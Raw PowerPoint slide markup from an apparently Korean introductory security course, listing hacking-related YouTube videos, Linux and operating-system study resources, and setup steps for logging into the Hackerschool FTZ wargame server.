          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId5"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="6555729" y="739451"/>
            <a:ext cx="4000500" cy="4352925"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="269115813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시연</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5B9977C2-3518-44F2-B5FC-D27847E33239}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGraphicFramePr>
            <a:graphicFrameLocks/>
          </p:cNvGraphicFramePr>
          <p:nvPr>
            <p:extLst>
              <p:ext uri="{D42A27DB-BD31-4B8C-83A1-F6EECF244321}">
                <p14:modId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="918938720"/>
              </p:ext>
            </p:extLst>
          </p:nvPr>
        </p:nvGraphicFramePr>
        <p:xfrm>
          <a:off x="2433099" y="2117820"/>
          <a:ext cx="8213698" cy="1798694"/>
        </p:xfrm>
        <a:graphic>
          <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/table">
            <a:tbl>
              <a:tblPr/>
              <a:tblGrid>
                <a:gridCol w="3681454">
                  <a:extLst>
                    <a:ext uri="{9D8B030D-6E8A-4147-A177-3AD203B41FA5}">
                      <a16:colId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" val="2798934004"/>
                    </a:ext>
                  </a:extLst>
                </a:gridCol>
                <a:gridCol w="3082886">
                  <a:extLst>
                    <a:ext uri="{9D8B030D-6E8A-4147-A177-3AD203B41FA5}">
                      <a16:colId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" val="1593522546"/>
                    </a:ext>
                  </a:extLst>
                </a:gridCol>
                <a:gridCol w="1449358">
                  <a:extLst>
                    <a:ext uri="{9D8B030D-6E8A-4147-A177-3AD203B41FA5}">
                      <a16:colId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" val="2799559108"/>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https://www.youtube.com/watch?v=fDXQYezdcIQ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Mysql</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" altLang="ko-KR" sz="1000" dirty="0"/>
                        <a:t> </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="ko-KR" altLang="en-US" sz="1000" dirty="0"/>
                        <a:t>취약점을 이용하여 공격자 </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" altLang="ko-KR" sz="1000" dirty="0"/>
                        <a:t>pc</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="ko-KR" altLang="en-US" sz="1000" dirty="0"/>
                        <a:t> </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" altLang="ko-KR" sz="1000" dirty="0"/>
                        <a:t>exploit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웹해킹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https://www.youtube.com/watch?v=MA6ugSrB8eY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지뢰찾기</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="ko-KR" altLang="en-US" sz="1000" dirty="0"/>
                        <a:t> </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" altLang="ko-KR" sz="1000" dirty="0"/>
                        <a:t>Crack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rPr>
                        <a:t>https://www.youtube.com/watch?v=jZPudR4pWxM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스마트홈</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="ko-KR" altLang="en-US" sz="1000" kern="0" spc="0" dirty="0">
                          <a:solidFill>
                            <a:srgbClr val="000000"/>
                          </a:solidFill>
                          <a:effectLst/>
                          <a:latin typeface="함초롬바탕" panose="02030604000101010101" pitchFamily="18" charset="-127"/>
                        </a:rPr>
                        <a:t> 기능 취약점 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해킹</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88353">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329">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2602977"/>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8485746"/>
                  </a:ext>
                </a:extLst>
              </a:tr>
            </a:tbl>
          </a:graphicData>
        </a:graphic>
      </p:graphicFrame>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="8" name="그룹 7">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{966CCEB0-4BA9-483E-9035-26E33B68AF88}"/>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D7A7E51B-5D79-4FE7-B335-F614E566CA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8D8533E-B021-4592-A781-274658F55D9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B615970-A4F1-4FED-96C0-2ACFD6F344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75804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관련 영상</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382005855"/>
              </p:ext>
            </p:extLst>
          </p:nvPr>
        </p:nvGraphicFramePr>
        <p:xfrm>
          <a:off x="2255365" y="2411681"/>
          <a:ext cx="7466275" cy="3275895"/>
        </p:xfrm>
        <a:graphic>
          <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/table">
            <a:tbl>
              <a:tblPr/>
              <a:tblGrid>
                <a:gridCol w="3681454">
                  <a:extLst>
                    <a:ext uri="{9D8B030D-6E8A-4147-A177-3AD203B41FA5}">
                      <a16:colId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" val="2798934004"/>
                    </a:ext>
                  </a:extLst>
                </a:gridCol>
                <a:gridCol w="3784821">
                  <a:extLst>
                    <a:ext uri="{9D8B030D-6E8A-4147-A177-3AD203B41FA5}">
                      <a16:colId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" val="1593522546"/>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https://www.youtube.com/watch?v=GisH2IQgob8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해킹</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" altLang="ko-KR" sz="1000" dirty="0"/>
                        <a:t> vs </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="ko-KR" altLang="en-US" sz="1000" dirty="0"/>
                        <a:t>해킹 </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" altLang="ko-KR" sz="1000" dirty="0"/>
                        <a:t>[</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="ko-KR" altLang="en-US" sz="1000" dirty="0" err="1"/>
                        <a:t>남과북</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file"/>
                        </a:rPr>
                        <a:t>https://www.youtube.com/watch?v=DkySqacKXlU</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사이버사령부 </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="ko-KR" altLang="en-US" sz="1000" kern="0" spc="0" dirty="0" err="1">
                          <a:solidFill>
                            <a:srgbClr val="000000"/>
                          </a:solidFill>
                          <a:effectLst/>
                          <a:latin typeface="함초롬바탕" panose="02030604000101010101" pitchFamily="18" charset="-127"/>
                        </a:rPr>
                        <a:t>국방망</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="ko-KR" altLang="en-US" sz="1000" kern="0" spc="0" dirty="0">
                          <a:solidFill>
                            <a:srgbClr val="000000"/>
                          </a:solidFill>
                          <a:effectLst/>
                          <a:latin typeface="함초롬바탕" panose="02030604000101010101" pitchFamily="18" charset="-127"/>
                        </a:rPr>
                        <a:t> 악성코드 침투사례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file"/>
                        </a:rPr>
                        <a:t>https://www.youtube.com/watch?v=gmt_mmo30Js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사이버테러 </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" altLang="ko-KR" sz="1000" kern="0" spc="0" dirty="0">
                          <a:solidFill>
                            <a:srgbClr val="000000"/>
                          </a:solidFill>
                          <a:effectLst/>
                          <a:latin typeface="함초롬바탕" panose="02030604000101010101" pitchFamily="18" charset="-127"/>
                        </a:rPr>
                        <a:t>3.20 </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="ko-KR" altLang="en-US" sz="1000" kern="0" spc="0" dirty="0">
                          <a:solidFill>
                            <a:srgbClr val="000000"/>
                          </a:solidFill>
                          <a:effectLst/>
                          <a:latin typeface="함초롬바탕" panose="02030604000101010101" pitchFamily="18" charset="-127"/>
                        </a:rPr>
                        <a:t>전산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file"/>
                        </a:rPr>
                        <a:t>https://www.youtube.com/watch?v=nfOLhuNwfI0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코로나 제약회사 해킹공격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168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file"/>
                        </a:rPr>
                        <a:t>https://www.youtube.com/watch?v=CVDDmotEmvI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사이버전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미군 말하는 사이버전의 위력</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7044283"/>
                  </a:ext>
                </a:extLst>
              </a:tr>
              <a:tr h="18735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rPr>
                        <a:t>https://www.youtube.com/watch?v=ynrsAtAlHqo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북한의 엄청난 해킹능력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소비에트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3493698"/>
                  </a:ext>
                </a:extLst>
              </a:tr>
              <a:tr h="15790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rPr>
                        <a:t>https://www.youtube.com/watch?v=XGWP7v0OzTI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미드웨이 해전 암호해독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5839265"/>
                  </a:ext>
                </a:extLst>
              </a:tr>
              <a:tr h="12844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file"/>
                        </a:rPr>
                        <a:t>https://www.youtube.com/watch?v=o4dCzqy1JrY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영화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에니그마</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="ko-KR" altLang="en-US" sz="1000" kern="0" spc="0" dirty="0">
                          <a:solidFill>
                            <a:srgbClr val="000000"/>
                          </a:solidFill>
                          <a:effectLst/>
                          <a:latin typeface="함초롬바탕" panose="02030604000101010101" pitchFamily="18" charset="-127"/>
                        </a:rPr>
                        <a:t> 해독 장면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88990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rPr>
                        <a:t>https://www.youtube.com/watch?v=IS3UpC121bI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어나니머스</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="ko-KR" altLang="en-US" sz="1000" dirty="0"/>
                        <a:t> 란 어떤 집단인가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258162"/>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92787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108375"/>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2"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000368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공부 사이트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937640493"/>
              </p:ext>
            </p:extLst>
          </p:nvPr>
        </p:nvGraphicFramePr>
        <p:xfrm>
          <a:off x="1755972" y="2039193"/>
          <a:ext cx="8394547" cy="3110756"/>
        </p:xfrm>
        <a:graphic>
          <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/table">
            <a:tbl>
              <a:tblPr/>
              <a:tblGrid>
                <a:gridCol w="2768425">
                  <a:extLst>
                    <a:ext uri="{9D8B030D-6E8A-4147-A177-3AD203B41FA5}">
                      <a16:colId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" val="2798934004"/>
                    </a:ext>
                  </a:extLst>
                </a:gridCol>
                <a:gridCol w="3498430">
                  <a:extLst>
                    <a:ext uri="{9D8B030D-6E8A-4147-A177-3AD203B41FA5}">
                      <a16:colId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" val="1593522546"/>
                    </a:ext>
                  </a:extLst>
                </a:gridCol>
                <a:gridCol w="2127692">
                  <a:extLst>
                    <a:ext uri="{9D8B030D-6E8A-4147-A177-3AD203B41FA5}">
                      <a16:colId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" val="2177897737"/>
                    </a:ext>
                  </a:extLst>
                </a:gridCol>
              </a:tblGrid>
              <a:tr h="351880">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26935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https://www.inflearn.com/course/%EC%9D%B4%EA%B2%83%EC%9D%B4-%EB%A6%AC%EB%88%85%EC%8A%A4%EB%8B%A4#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0" i="0" kern="1200" dirty="0">
                          <a:solidFill>
                            <a:schemeClr val="tx1"/>
                          </a:solidFill>
                          <a:effectLst/>
                          <a:latin typeface="+mn-lt"/>
                          <a:ea typeface="+mn-ea"/>
                          <a:cs typeface="+mn-cs"/>
                        </a:rPr>
                        <a:t>'</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="ko-KR" altLang="en-US" sz="1000" b="0" i="0" kern="1200" dirty="0">
                          <a:solidFill>
                            <a:schemeClr val="tx1"/>
                          </a:solidFill>
                          <a:effectLst/>
                          <a:latin typeface="+mn-lt"/>
                          <a:ea typeface="+mn-ea"/>
                          <a:cs typeface="+mn-cs"/>
                        </a:rPr>
                        <a:t>이것이 리눅스다</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" altLang="ko-KR" sz="1000" b="0" i="0" kern="1200" dirty="0">
                          <a:solidFill>
                            <a:schemeClr val="tx1"/>
                          </a:solidFill>
                          <a:effectLst/>
                          <a:latin typeface="+mn-lt"/>
                          <a:ea typeface="+mn-ea"/>
                          <a:cs typeface="+mn-cs"/>
                        </a:rPr>
                        <a:t>' </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="ko-KR" altLang="en-US" sz="1000" b="0" i="0" kern="1200" dirty="0">
                          <a:solidFill>
                            <a:schemeClr val="tx1"/>
                          </a:solidFill>
                          <a:effectLst/>
                          <a:latin typeface="+mn-lt"/>
                          <a:ea typeface="+mn-ea"/>
                          <a:cs typeface="+mn-cs"/>
                        </a:rPr>
                        <a:t>저자의 </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" altLang="ko-KR" sz="1000" b="0" i="0" kern="1200" dirty="0">
                          <a:solidFill>
                            <a:schemeClr val="tx1"/>
                          </a:solidFill>
                          <a:effectLst/>
                          <a:latin typeface="+mn-lt"/>
                          <a:ea typeface="+mn-ea"/>
                          <a:cs typeface="+mn-cs"/>
                        </a:rPr>
                        <a:t>Red Hat CentOS7 </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="ko-KR" altLang="en-US" sz="1000" b="0" i="0" kern="1200" dirty="0">
                          <a:solidFill>
                            <a:schemeClr val="tx1"/>
                          </a:solidFill>
                          <a:effectLst/>
                          <a:latin typeface="+mn-lt"/>
                          <a:ea typeface="+mn-ea"/>
                          <a:cs typeface="+mn-cs"/>
                        </a:rPr>
                        <a:t>리눅스 서버</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" altLang="ko-KR" sz="1000" b="0" i="0" kern="1200" dirty="0">
                          <a:solidFill>
                            <a:schemeClr val="tx1"/>
                          </a:solidFill>
                          <a:effectLst/>
                          <a:latin typeface="+mn-lt"/>
                          <a:ea typeface="+mn-ea"/>
                          <a:cs typeface="+mn-cs"/>
                        </a:rPr>
                        <a:t>&amp;</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="ko-KR" altLang="en-US" sz="1000" b="0" i="0" kern="1200" dirty="0">
                          <a:solidFill>
                            <a:schemeClr val="tx1"/>
                          </a:solidFill>
                          <a:effectLst/>
                          <a:latin typeface="+mn-lt"/>
                          <a:ea typeface="+mn-ea"/>
                          <a:cs typeface="+mn-cs"/>
                        </a:rPr>
                        <a:t>네트워크 강좌 는 그 동안 리눅스 설치만 해놓거나 설치부터 막혀서 포기했던 분께 리눅스를 마스터할 마지막 기회를 제공해 줍니다</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" altLang="ko-KR" sz="1000" b="0" i="0" kern="1200" dirty="0">
                          <a:solidFill>
                            <a:schemeClr val="tx1"/>
                          </a:solidFill>
                          <a:effectLst/>
                          <a:latin typeface="+mn-lt"/>
                          <a:ea typeface="+mn-ea"/>
                          <a:cs typeface="+mn-cs"/>
                        </a:rPr>
                        <a:t>. </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="ko-KR" altLang="en-US" sz="1000" b="0" i="0" kern="1200" dirty="0" err="1">
                          <a:solidFill>
                            <a:schemeClr val="tx1"/>
                          </a:solidFill>
                          <a:effectLst/>
                          <a:latin typeface="+mn-lt"/>
                          <a:ea typeface="+mn-ea"/>
                          <a:cs typeface="+mn-cs"/>
                        </a:rPr>
                        <a:t>우재남</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="ko-KR" altLang="en-US" sz="1000" b="0" i="0" kern="1200" dirty="0">
                          <a:solidFill>
                            <a:schemeClr val="tx1"/>
                          </a:solidFill>
                          <a:effectLst/>
                          <a:latin typeface="+mn-lt"/>
                          <a:ea typeface="+mn-ea"/>
                          <a:cs typeface="+mn-cs"/>
                        </a:rPr>
                        <a:t> 저자는 ‘초보자도 리눅스의 실무 기능을 막힘 없이 실습 가능하도록’ </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" altLang="ko-KR" sz="1000" b="0" i="0" kern="1200" dirty="0">
                          <a:solidFill>
                            <a:schemeClr val="tx1"/>
                          </a:solidFill>
                          <a:effectLst/>
                          <a:latin typeface="+mn-lt"/>
                          <a:ea typeface="+mn-ea"/>
                          <a:cs typeface="+mn-cs"/>
                        </a:rPr>
                        <a:t>17</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="ko-KR" altLang="en-US" sz="1000" b="0" i="0" kern="1200" dirty="0">
                          <a:solidFill>
                            <a:schemeClr val="tx1"/>
                          </a:solidFill>
                          <a:effectLst/>
                          <a:latin typeface="+mn-lt"/>
                          <a:ea typeface="+mn-ea"/>
                          <a:cs typeface="+mn-cs"/>
                        </a:rPr>
                        <a:t>년간의 생생한 강의 경험을 이 책과 동영상에 담아냈습니다</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" altLang="ko-KR" sz="1000" b="0" i="0" kern="1200" dirty="0">
                          <a:solidFill>
                            <a:schemeClr val="tx1"/>
                          </a:solidFill>
                          <a:effectLst/>
                          <a:latin typeface="+mn-lt"/>
                          <a:ea typeface="+mn-ea"/>
                          <a:cs typeface="+mn-cs"/>
                        </a:rPr>
                        <a:t>.</a:t>
                      </a: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270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http://www.kocw.net/home/search/kemView.do?kemId=978503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운영체제 유명한 강좌 </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" altLang="ko-KR" sz="1000" dirty="0"/>
                        <a:t>- </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="ko-KR" altLang="en-US" sz="1000" dirty="0"/>
                        <a:t>경성대학교</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a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{DCB218AE-9FA8-44ED-856E-7676788E67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348" t="2000" r="15075" b="-806"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="8407625" y="2557083"/>
            <a:ext cx="1416106" cy="198254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51031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6907344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yber security concept Premium Vector">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{7D09DF66-D0B0-42FF-8655-B77E663ED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443038"/>
            <a:ext cx="5962650" cy="397192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355532C0-3A48-4806-9258-0FB8459A691F}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="11593737" y="6457890"/>
            <a:ext cx="678993" cy="400110"/>
            <a:chOff x="10627762" y="-30288"/>
            <a:chExt cx="597159" cy="400110"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="4" name="사각형: 둥근 모서리 3">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{09034DB3-C595-43AD-B469-7781A2A40DA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9FC2B289-560D-4C46-AB93-EA4B48AFF41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 name="화살표: 오른쪽 5">
              <a:hlinkClick r:id="rId3" action="ppaction://hlinksldjump"/>
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{76A7AC15-6204-408C-9D17-82E4ECD332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41557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16. </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10EC0D99-882D-4848-8D0F-896764C5B7F0}"/>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13. </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000" dirty="0"/>
              <a:t>설정을 저장한다</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" dirty="0"/>
              <a:t>. FTZ </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000" dirty="0"/>
              <a:t>입력 후 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" dirty="0"/>
              <a:t>Save</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000" dirty="0"/>
              <a:t> 버튼을 누른다</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14. Open </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000" dirty="0"/>
              <a:t>을 클릭하여 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" dirty="0"/>
              <a:t>FTZ </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000" dirty="0"/>
              <a:t>서버로 접속한다</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" dirty="0"/>
              <a:t>. ( </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000" dirty="0"/>
              <a:t>어떤 메시지가 나오면 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" dirty="0"/>
              <a:t>‘</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000" dirty="0"/>
              <a:t>예</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" dirty="0"/>
              <a:t>’ or</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" dirty="0"/>
              <a:t>‘yes’ </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000" dirty="0"/>
              <a:t>클릭 </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15. </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000" dirty="0"/>
              <a:t>로그인 화면이 나타나면</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" dirty="0"/>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000" dirty="0"/>
              <a:t>성공</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" dirty="0"/>
              <a:t>! </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해커스쿨은</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" dirty="0"/>
              <a:t>, level1 ~ 30 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000" dirty="0"/>
              <a:t>으로 되어 있으며</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" dirty="0"/>
              <a:t>, level1 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000" dirty="0"/>
              <a:t>의 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" dirty="0"/>
              <a:t>id </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000" dirty="0"/>
              <a:t>는</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" dirty="0"/>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="7030A0"/>
                </a:solidFill>
              </a:rPr>
              <a:t>level1 / level1 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000" dirty="0"/>
              <a:t>이다</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" dirty="0"/>
              <a:t>.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="140000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000" dirty="0"/>
              <a:t>로그인을 시도해본다</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" dirty="0"/>
              <a:t>.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="140000"/>
              </a:lnSpc>
            </a:pPr>
            <a:endParaRPr lang="en-US" altLang="ko-KR" sz="1000" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="140000"/>
              </a:lnSpc>
            </a:pPr>
            <a:endParaRPr lang="en-US" altLang="ko-KR" sz="1000" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="18" name="그림 17">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{E9A2CF06-B951-490D-9C69-F18AD64FD85F}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId4"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="1390081" y="847051"/>
            <a:ext cx="2733675" cy="1362075"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="19" name="그림 18">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{8B45BCCC-0353-41BC-81CB-8C0824FF5D14}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId5"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="1390081" y="2687179"/>
            <a:ext cx="2790825" cy="962025"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="20" name="직사각형 19">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{AC2DF6D4-8C5A-4948-9CE4-0C73BA95D819}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2460210" y="3384903"/>
            <a:ext cx="795718" cy="248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1" name="그림 20">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{B01A4CF9-A37F-41FB-A056-B41F1CFD3638}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId6"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="530171" y="4544461"/>
            <a:ext cx="5327266" cy="1075153"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="4" name="그림 3">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{22829F7F-A5F6-4BD1-A88E-75884C2E9C31}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId7"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="6303955" y="723534"/>
            <a:ext cx="5344450" cy="1963645"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="30978750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/Environ/WSLOfflinePackageInstall</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" altLang="ko-KR" dirty="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" dirty="0"/>
              <a:t>  WSL </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" dirty="0"/>
              <a:t>패키지 오프라인 설치</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" dirty="0"/>
              <a:t>(bgpdump)</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http://archive.ubuntu.com</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
